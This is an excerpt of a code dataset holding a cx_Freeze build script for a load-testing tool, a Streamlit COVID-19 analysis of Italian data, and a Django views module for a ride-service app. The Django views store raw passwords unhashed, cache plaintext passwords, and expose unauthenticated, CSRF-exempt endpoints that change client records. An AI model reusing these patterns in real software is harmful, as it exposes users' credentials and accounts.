'HOME' path\nif \"HOME\" not in os.environ and \"HOMEPATH\" in os.environ:\n os.environ.setdefault(\"HOME\", os.environ.get(\"HOMEPATH\", \"\"))\n print(\"Initializing HOME environment variable to '{}'\".format(os.environ[\"HOME\"]))\n\n# Since we included pywin32 extensions, cx_Freeze tries to create a\n# version resource. This only supports the 'a.b.c[.d]' format.\n# Our version has either the for '1.2.3' or '1.2.3-a1'\nmajor, minor, patch = org_version.split(\".\", 3)\nmajor = int(major)\nminor = int(minor)\nif \"-\" in patch:\n # We have a pre-release version, e.g. '1.2.3-a1'.\n # This is presumably a post-release increment after '1.2.2' release.\n # It must NOT be converted to '1.2.3.1', since that would be *greater*\n # than '1.2.3', which is not even released yet.\n # Approach 1:\n # We cannot guarantee that '1.2.2.1' is correct either, so for\n # pre-releases we assume '0.0.0.0':\n # major = minor = patch = alpha = 0\n # Approach 2:\n # '1.2.3-a1' was presumably a post-release increment after '1.2.2',\n # so assume '1.2.2.1':\n patch, alpha = patch.split(\"-\", 1)\n patch = int(patch)\n # Remove leading letters\n alpha = re.sub(\"^[a-zA-Z]+\", \"\", alpha)\n alpha = int(alpha)\n if patch >= 1:\n patch -= 1 # 1.2.3-a1 => 1.2.2.1\n else:\n # may be 1.2.0-a1 or 2.0.0-a1: we don't know what the previous release was\n major = minor = patch = alpha = 0\nelse:\n patch = int(patch)\n alpha = 0\n\nversion = \"{}.{}.{}.{}\".format(major, minor, patch, alpha)\nprint(\"Version {}, using {}\".format(org_version, version))\n\ntry:\n readme = open(\"README.md\", \"rt\").read()\nexcept IOError:\n readme = \"(readme not found. 
Running from tox/setup.py test?)\"\n\ninstall_requires = [\n \"dateutil\", # NOTE: import 'dateutil' although PyPI package is named 'python-dateutil'\n \"fabulist\",\n \"lxml\",\n \"requests\",\n \"snazzy\",\n \"yaml\", # NOTE: 'yaml' although PyPI package is named 'PyYAML'\n]\nsetup_requires = install_requires\ntests_require = [] # \"pytest\", \"pytest-cov\", \"tox\", \"virtualenv\"]\n\n# # cx_Freeze seems to be confused by module name 'PyYAML' which\n# # must be imported as 'yaml', so we rename here. However it must\n# # be listed as 'PyYAML' in the requirements.txt and be installed!\n# install_requires.remove(\"PyYAML\")\n# install_requires.append(\"yaml\")\n\nexecutables = [\n Executable(\n script=\"stressor/stressor_cli.py\",\n base=None,\n targetName=\"stressor.exe\",\n icon=\"docs/logo.ico\",\n shortcutName=\"stressor\",\n copyright=\"(c) 2020-2021 Martin Wendt\",\n )\n]\n\n# See https://cx-freeze.readthedocs.io/en/latest/distutils.html#build-exe\nbuild_exe_options = {\n # \"init_script\": \"Console\",\n \"includes\": install_requires,\n # \"packages\": [\"keyring.backends\"], # loaded dynamically\n \"constants\": \"BUILD_COPYRIGHT='(c) 2020-2021 Martin Wendt'\",\n}\n\n# See https://cx-freeze.readthedocs.io/en/latest/distutils.html#bdist-msi\nbdist_msi_options = {\n \"upgrade_code\": \"{3DA14E9B-1D2A-4D90-92D0-2375CF66AC3D}\",\n \"add_to_path\": True,\n # \"all_users\": True,\n # \"install_icon\": \"docs/logo.ico\",\n}\n\npackages = find_packages(exclude=[\"test\"])\n\nsetup(\n name=\"stressor\",\n version=version,\n author=\"Martin Wendt\",\n author_email=\"stressor@wwwendt.de\",\n # copyright=\"(c) 2020-2021 Martin Wendt\",\n maintainer=\"Martin Wendt\",\n maintainer_email=\"stressor@wwwendt.de\",\n url=\"https://github.com/mar10/stressor\",\n description=\"Synchronize directories using FTP(S), SFTP, or file system access.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n # Not required for this build-only setup config:\n classifiers=[],\n keywords=\"web server load test stress\",\n license=\"The MIT License\",\n install_requires=install_requires,\n setup_requires=setup_requires,\n tests_require=tests_require,\n packages=packages,\n package_data={\n # If any package contains *.txt files, include them:\n # \"\": [\"*.css\", \"*.html\", \"*.ico\", \"*.js\"],\n \"\": [\"*.tmpl\"],\n \"stressor.monitor\": [\"htdocs/*.*\"],\n },\n zip_safe=False,\n extras_require={},\n # cmdclass={\"test\": ToxCommand, \"sphinx\": SphinxCommand},\n entry_points={\"console_scripts\": [\"stressor = stressor.stressor_cli:run\"]},\n executables=executables,\n options={\"build_exe\": build_exe_options, \"bdist_msi\": bdist_msi_options},\n)\n", "repo_name": "simrit1/stressor", "sub_path": "setup_bdist_msi.py", "file_name": "setup_bdist_msi.py", "file_ext": "py", "file_size_in_byte": 4945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "stressor.__version__", "line_number": 20, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": 
"attribute"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 85, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 111, "usage_type": "call"}, {"api_name": "cx_Freeze.setup", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "36645290158", "text": "import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport plotly.express as px\nimport datetime\nfrom datetime import date, timedelta\nfrom sklearn.cluster import KMeans\nfrom fbprophet import Prophet\nfrom fbprophet.plot import plot_plotly, add_changepoints_to_plot\nimport plotly.offline as py\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\nimport statsmodels.api as sm\nfrom keras.models import Sequential\nfrom keras.layers import LSTM,Dense\nfrom keras.layers import Dropout\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.preprocessing.sequence import TimeseriesGenerator\nimport streamlit as st\n\nst.title('COVID 19')\n\nst.subheader('SINTOMI COVID 19')\nsymptoms={'symptom':['Fever',\n 'Dry cough',\n 'Fatigue',\n 'Sputum production',\n 'Shortness of breath',\n 'Muscle pain',\n 'Sore throat',\n 'Headache',\n 'Chills',\n 'Nausea or vomiting',\n 'Nasal congestion',\n 'Diarrhoea',\n 'Haemoptysis',\n 'Conjunctival congestion'],'percentage':[87.9,67.7,38.1,33.4,18.6,14.8,13.9,13.6,11.4,5.0,4.8,3.7,0.9,0.8]}\n\nsymptoms=pd.DataFrame(data=symptoms,index=range(14))\nsymptoms\n\nfig = px.bar(symptoms[['symptom', 'percentage']].sort_values('percentage', ascending=False), \n y=\"percentage\", x=\"symptom\", color='symptom', \n log_y=True, template='ggplot2', title='Symptom of Coronavirus')\nfig.show()\nplt.figure(figsize=(15,15))\nplt.title('Symptoms of Coronavirus',fontsize=20) \nplt.pie(symptoms['percentage'],autopct='%1.1f%%')\nplt.legend(symptoms['symptom'],loc='best')\n\nst.pyplot()\n\n\n# **Reading Data**\n\n# %% [code]\ndata=pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19-ita-regions.csv\")\n\n# %% [code]\nan_data = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/COVID19_open_line_list.csv\")\n\n# %% [code]\ncomp = pd.read_excel('https://github.com/terence92/covid-19/blob/master/COVID-19-3.27-top30-500.xlsx?raw=true')\n\n# %% [code]\nprovince = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19_italy_province.csv\")\n\ndat = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19_italy_province.csv\")\n\n# %% [markdown]\n# **Looking into data**\n\n# %% [code]\n\n# %% [code]\nan_data = an_data[an_data['country']=='Italy']\nan_data.shape\nst.dataframe(an_data)\n\n# %% [markdown]\n# **Age distribution of Confirmation**\nst.subheader('DISTRIBUZIONE ANNI CASI CONFERMATI')\n# %% [code]\nplt.figure(figsize=(10,6))\nsns.set_style(\"darkgrid\")\nplt.title(\"Age distribution of Confirmation\")\nsns.kdeplot(data=an_data['age'], shade=True).set(xlim=(0))\nst.pyplot()\n\n\n# %% [markdown]\n# > **Age**\n# \n# **Here, the graph shows the age distribution of the infected people by gender. We can clearly see older people are more likely to be infected, especially older people with having lung disease and problems in their respiratory system. The age group of 40 to 50yr are more infected than the rest of the population in men. 
On the other hand age groups of 50yr to 70yr are more infected in womens. As Dr.Steven Gambert, professor of medicine and director of geriatrics at the University of Maryland School of Medicine says “ Older people have higher risk of underlying health conditions, older people are already under physical stress, and their immune systems, even if not significantly compromised, simply do not have the same “ability to fight viruses and bacteria”. As data says Italy has the oldest population across globe by count. According to EU statistics Italy has the lowest percentage of young people**.\n\n# %% [markdown]\n# **Gender Distribution of Confirmatioin**\nst.subheader('DISTRIBUZIONE DI GENERE COVID 19')\n# %% [code]\nplt.figure(figsize=(15, 5))\nplt.title('Gender')\nan_data.sex.value_counts().plot.bar();\n\n# %% [code]\nfig = px.pie( values=an_data.groupby(['sex']).size().values,names=an_data.groupby(['sex']).size().index)\nfig.update_layout(\n font=dict(\n size=15,\n color=\"#242323\"\n )\n ) \n \nst.pyplot()\n\n\ndata.head()\n\n# %% [markdown]\n# **Checking for Null Value**\n\n# %% [code]\ndata.isna().sum()\n\n# %% [markdown]\n# **Description of Data**\n\n# %% [code]\ndata.describe().T\n\n# %% [markdown]\n# **Tracking the Patient**\n\n# %% [code]\ndata.shape\n\ndata['Date'] = pd.to_datetime(data['Date']).dt.normalize()\ndaily = data.sort_values(['Date','Country','RegionName'])\nlatest = data[data.Date == daily.Date.max()]\nlatest.head()\n\ndata_groupby_region = latest.groupby(\"RegionName\")[['TotalPositiveCases', 'Deaths', 'Recovered','TestsPerformed','HospitalizedPatients','TotalHospitalizedPatients']].sum().reset_index()\ndgr = data_groupby_region \ndgr.head()\n\n# %% [markdown]\n# **Desciption of Grouped Data by Region**\n\n# %% [code]\ndgr.describe().T\n\n# %% [markdown]\n# **Test performed vs Region**\nst.subheader('tamponi REGIONE')\n# %% [code]\nfig = px.bar(dgr[['RegionName', 'TestsPerformed']].sort_values('TestsPerformed', ascending=False), \n y=\"TestsPerformed\", x=\"RegionName\", color='RegionName', \n log_y=True, template='ggplot2', title='Test Performed vs Region')\n\nst.pyplot()\n\n# %% [markdown]\n# **As the graph shows the test performed in different regions of Italy. Lombardia has the maximum number(25k+) of tests performed as it is the most infected in cities. As a result the next graph shows that it has the maximum number(7280) of positive coronavirus patients. Veneto is the second most infected city here followed by some more countries like Emilia Romagna, Lazio, Marche, Toscana, Piemonte, Friuli V.G. ,Campania, Sicilia, Liguria, Puglia, P.A. Trento, Calabria, Umbria, Abruzzo, Sardegna, Molisa, Basilicata, Valle d'Aosta, P.A. 
Bolzano etc.\n# **\n\n# %% [markdown]\n# **Confirmed Cases vs Region**\nst.subheader('CASI CONFERMATI - REGIONE')\n# %% [code]\nfig = px.bar(dgr[['RegionName', 'TotalPositiveCases']].sort_values('TotalPositiveCases', ascending=False), \n y=\"TotalPositiveCases\", x=\"RegionName\", color='RegionName', \n log_y=True, template='ggplot2', title='Confirmed Cases vs Region')\nfig.show()\nst.pyplot()\n", "repo_name": "terence92/covid-19", "sub_path": "prova.py", "file_name": "prova.py", "file_ext": "py", "file_size_in_byte": 6228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.title", "line_number": 23, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 44, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pie", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 70, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 80, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "seaborn.set_style", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 90, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "plotly.express.pie", "line_number": 107, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 107, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.subheader", 
"line_number": 155, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 157, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 157, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 161, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 169, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 171, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 171, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "35330654963", "text": "\n\n# Create your views here.\nfrom django.shortcuts import render\nfrom .models import Client,Saldo,Calificacion\nfrom drivers.models import Driver \nfrom django.http.response import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.db.models import Sum,Avg,Count\nfrom django.views import View\nfrom django.views.generic import CreateView,ListView\nfrom .forms import ClientForm\nfrom serveces.models import Services\nfrom datetime import datetime \n#importar reverse\nfrom django.urls import reverse\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth.models import User\n# importar cache\nfrom django.core.cache import cache\n\n\n\n\n# Create your views here.\n\nclass Clientes(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def get(self,request,id):\n listpop=[\"id\",\"token\",\"identification\",\"genero\",\"email\",\"imgcc\",\"tel\"]\n clientes=list(Client.objects.filter(pk=id).values())\n for i in listpop:\n clientes[0].pop(i)\n calificacion=Calificacion.objects.filter(usuario=id).aggregate(Avg('calificaciones'))#consulta la calificacion del cliente\n calificacion2=Calificacion.objects.filter(usuario=id).aggregate(Count('calificaciones'))\n if calificacion['calificaciones__avg']==None:\n clientes[0]['calificacion']=0\n clientes[0]['viajes']=0\n\n else: \n clientes[0]['calificacion']=calificacion.get('calificaciones__avg')\n clientes[0]['viajes']=calificacion2.get('calificaciones__count')\n saldo1=Saldo.objects.filter(usuario=id).aggregate(Sum(\"saldo\"))\n clientes[0][\"saldo\"]=saldo1.get('saldo__sum')\n isDriver=Driver.objects.filter(persona=id).exists()\n print(clientes)\n datos={'clients':clientes,\"conductor\":isDriver}\n print(clientes)\n return JsonResponse(datos)\n\n def post(self,request,id):\n cl=(request.POST)\n correo=cl[\"correo\"]\n token1=cl[\"token\"]\n iden=cl[\"identification\"]\n print(correo)\n imgen=request.FILES\n imgen=imgen[\"imagen\"]\n print(imgen)\n cliente=Client.objects.create(token=token1,identification=iden,name=cl[\"name\"],lastname=cl[\"lastname\"],genero=cl[\"genero\"],email=cl[\"correo\"],img=imgen,tel=cl[\"telefono\"])\n Token.objects.create(user=cliente)\n datos={\"cliente\":\"tegistrado\"}\n print('cliente no existe')\n \n return JsonResponse(datos)\n\n \n\nclass ClientCreateView(CreateView):\n model = Client\n template_name = \"add_clients.html\"\n form_class=ClientForm\n \n def post(self, request) :\n print(\"=====================================post =============================\")\n cliente_form=(request.POST)\n cliente_form_files=(request.FILES)\n \n usuario=User.objects.get_or_create(username=cliente_form[\"email\"],password=cliente_form[\"password\"],email=cliente_form[\"email\"])\n 
usuario=User.objects.get(username=cliente_form[\"email\"])\n try:\n Token.objects.get_or_create(user=usuario)\n except(KeyError,Client.DoesNotExist):\n print(\"error\",KeyError,Client.DoesNotExist)\n cliente=Client.objects.filter(email=cliente_form[\"email\"])\n if cliente:\n print(\"cliente ya existe\")\n return render(request, 'bienvenido.html', {'bienvenido': 'ya estas registrado'})\n cliente=Client.objects.create(identification=cliente_form[\"identification\"],name=cliente_form[\"name\"],lastname=cliente_form[\"lastname\"],genero=cliente_form[\"genero\"],email=cliente_form[\"email\"],img=cliente_form_files[\"img\"],tel=cliente_form[\"tel\"],usuario=usuario)\n cache.set(usuario,cliente_form[\"password\"])\n print (\"==========end post============\")\n return render(request, 'bienvenido.html', {'bienvenido': 'Bienvenid@'})\n \n\nclass ClientDriverCreateView(CreateView):\n model = Client\n template_name = \"add_clients.html\"\n form_class=ClientForm\n\n # funcion para guardar el cliente\n def form_valid(self, form):\n print(form,\"======================\")\n form.save()\n return super().form_valid(form)\n\n # funcion para redireccionar a la pagina de inicio\n def get_success_url(self):\n return reverse('drivers:adddriver')\n\n\nclass ClientesInfo(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n ci=json.loads(request.body)\n listpop=[\"token\",\"identification\",\"genero\",\"email\",\"imgcc\"]\n clientes=list(Client.objects.filter(email=ci[\"correo\"]).values())\n print(clientes,\"=====================\")\n idcli=clientes[0][\"id\"]\n for i in listpop:\n clientes[0].pop(i)\n calificacion=Calificacion.objects.filter(usuario=idcli).aggregate(Avg('calificaciones'))#consulta la calificacion del cliente\n calificacion2=Calificacion.objects.filter(usuario=idcli).aggregate(Count('calificaciones'))\n saldo1=Saldo.objects.filter(usuario=idcli).aggregate(Sum(\"saldo\"))\n if calificacion['calificaciones__avg']==None:\n clientes[0]['calificacion']=0.0\n clientes[0]['viajes']=0\n\n else: \n clientes[0]['calificacion']=calificacion.get('calificaciones__avg')\n clientes[0]['viajes']=calificacion2.get('calificaciones__count')\n \n if saldo1['saldo__sum']==None:\n clientes[0][\"saldo\"]=0\n else:\n clientes[0][\"saldo\"]=saldo1.get('saldo__sum')\n isDriver=Driver.objects.filter(persona=idcli).exists()\n print(clientes)\n datos={'clients':clientes,\"conductor\":isDriver}\n print(clientes)\n return JsonResponse(datos)\n\n \n\nclass ClientesCalification(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n cc=json.loads(request.body)\n ahora=datetime.now()\n if cc[\"rol\"]==\"condutor\":\n Calificacion.objects.create(usuario=Client.objects.get(pk=cc[\"id\"]),calificaciones=cc[\"calificacion\"],comentario=cc[\"comentario\"])\n servicio=Services.objects.filter(tpedido=cc[\"hora\"]).update(tterminado=ahora)\n print(servicio)\n #Saldo.objects.create(usuario=Client.objects.get(pk=cc[\"mi_id\"]),saldo=cc[\"precio\"],frecarga=ahora)\n else:\n Calificacion.objects.create(usuario=Client.objects.get(pk=cc[\"id\"]),calificaciones=cc[\"calificacion\"],comentario=cc[\"comentario\"])\n \"\"\"if cc[\"pago\"]==\"efectivo\":\n return JsonResponse({\"succes\":\"succes\"})\n else:\n Saldo.objects.create(usuario=Client.objects.get(pk=cc[\"mi_id\"]),saldo=-cc[\"precio\"],frecarga=ahora)\"\"\" \n 
return JsonResponse({\"calificacion\":\"calificado\"})\n\nclass ClientesNotification(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n cn=json.loads(request.body)\n tok=Client.objects.get(pk=cn[\"id\"])\n tok.tokenNotifi=cn[\"tokenN\"]\n tok.save()\n return JsonResponse({'token':'se agrego el token'})\n\n\n# crear vista para ingresar conductores\n\nclass ClientList(ListView):\n model = Client\n template_name = \"list_clients.html\"\n context_object_name = \"clients\"\n \n def get_queryset(self):\n today=datetime.now()\n # obtener ultima fecha en la que se recargo el saldo\n fecha_recarga= Saldo.objects.all().latest('frecarga')\n print(fecha_recarga)\n return Client.objects.all()\n\n\"\"\"class AddClientes(View):\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self,request):\n ac=json.loads(request.body)\n Client.objects.create(token= ,identification= ,name= ,lastname= ,genero= ,email= ,)\n\"\"\"\n\n\n\n\n\n", "repo_name": "MaquiDuran2807/api-server2", "sub_path": "clients/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 8227, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 30, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 30, "usage_type": "argument"}, {"api_name": "models.Client.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Saldo.objects.filter", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 48, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects.filter", "line_number": 50, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "drivers.models.Driver", "line_number": 50, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Client.objects.create", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 65, "usage_type": "name"}, {"api_name": 
"rest_framework.authtoken.models.Token.objects.create", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.models.Token.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.authtoken.models.Token", "line_number": 66, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 70, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 74, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 75, "usage_type": "name"}, {"api_name": "forms.ClientForm", "line_number": 77, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get_or_create", "line_number": 84, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 84, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 85, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 85, "usage_type": "name"}, {"api_name": "rest_framework.authtoken.models.Token.objects.get_or_create", "line_number": 87, "usage_type": "call"}, {"api_name": "rest_framework.authtoken.models.Token.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "rest_framework.authtoken.models.Token", "line_number": 87, "usage_type": "name"}, {"api_name": "models.Client.DoesNotExist", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 88, "usage_type": "name"}, {"api_name": "models.Client.DoesNotExist", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 89, "usage_type": "name"}, {"api_name": "models.Client.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Client.objects.create", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 94, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 95, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 100, "usage_type": "name"}, {"api_name": "models.Client", "line_number": 101, "usage_type": "name"}, {"api_name": "forms.ClientForm", "line_number": 103, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 116, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 117, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 117, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Client.objects.filter", "line_number": 124, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 124, "usage_type": "attribute"}, 
{"api_name": "models.Client", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 129, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 129, "usage_type": "call"}, {"api_name": "models.Calificacion.objects.filter", "line_number": 130, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 130, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 130, "usage_type": "call"}, {"api_name": "models.Saldo.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Saldo.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "models.Saldo", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 131, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects.filter", "line_number": 144, "usage_type": "call"}, {"api_name": "drivers.models.Driver.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "drivers.models.Driver", "line_number": 144, "usage_type": "name"}, {"api_name": "django.http.response.JsonResponse", "line_number": 148, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 152, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 153, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 153, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 159, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 159, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.create", "line_number": 161, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 161, "usage_type": "name"}, {"api_name": "models.Client.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "models.Client", "line_number": 161, "usage_type": "name"}, {"api_name": "serveces.models.Services.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "serveces.models.Services.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "serveces.models.Services", "line_number": 162, "usage_type": "name"}, {"api_name": "models.Calificacion.objects.create", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Calificacion.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "models.Calificacion", "line_number": 166, "usage_type": "name"}, {"api_name": "models.Client.objects.get", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Client.objects", "line_number": 166, "usage_type": "attribute"}, {"api_name": "models.Client", 